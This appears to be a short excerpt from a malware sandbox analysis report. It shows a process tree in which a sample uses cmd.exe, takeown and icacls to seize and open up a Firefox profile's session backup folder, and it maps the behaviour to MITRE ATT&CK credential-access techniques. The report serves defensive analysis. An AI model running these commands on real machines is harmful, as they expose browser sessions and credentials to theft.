C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release\sessionstore-backups && icacls C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release\sessionstore-backups /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release\sessionstore-backups3⤵
-
-
Network
MITRE ATT&CK Enterprise v15
Credential Access
Credentials from Password Stores
2Credentials from Web Browsers
1Windows Credential Manager
1Unsecured Credentials
1Credentials In Files
1